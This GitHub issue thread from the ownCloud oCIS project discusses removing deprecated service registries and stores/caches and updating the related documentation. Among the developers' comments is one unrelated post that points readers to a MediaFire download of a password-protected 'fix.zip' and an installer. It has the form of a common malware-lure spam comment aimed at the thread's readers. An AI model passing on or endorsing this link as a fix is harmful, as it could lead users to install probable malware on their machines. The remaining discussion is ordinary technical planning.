### ISSUE TITLE
Remove deprecated registries and caches/stores

### ISSUE THREAD

**Issue by mmattel** [owncloud/ocis#9938]
We currently have inconsistencies with regards what we plan, document and code for **registries** and **stores/caches**.

We should therefore:

* remove all deprecated registries and stores/caches from the code
* update the respective envvar descriptions in the services affected accordingly which includes `MICRO_REGISTRY`
* update the dev docs like in [registry](https://owncloud.dev/services/general-info/registry/)
similar to the admin docs, I propose to add a store/caches page at the same location for a central description and reference it from the services. this would dramatically ease overview and maintenance!
* update the admin docs
this is relatively easy, as we have common reused text blocks, and some single pages where we need some adaptions

@micbar as discussed

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kobergj** [comment]
From what I found:
Deprecated Stores/Caches:
* ocmem
* redis
* etcd
* nats-js

Deprecated Registries:
* kubernetes
* nats
* etcd
* consul
* mdns

@mmattel could you double check that list so I'm not missing one?

**Comment by kobergj** [comment]
Funny. `kubernetes` registry is not marked as deprecated in the docs but if you enable it will print out that it is:
```
fmt.Println("Attention: kubernetes registry is deprecated, use nats-js-kv instead")
```
How do we proceed with that?

**Comment by mmattel** [comment]
That is interresting, from the admin docs:
![image](https://github.com/user-attachments/assets/6b539d5a-7108-43a6-b891-1f27f49964fc)
and
![image](https://github.com/user-attachments/assets/60f99712-fc0a-41f8-9791-91475f982bed)

**Comment by kobergj** [comment]
Yes I see. So what do we do with `kubernetes` registry?

**Comment by kobergj** [comment]
Decided to remove `kubernetes` registry anyways. Let them complain!
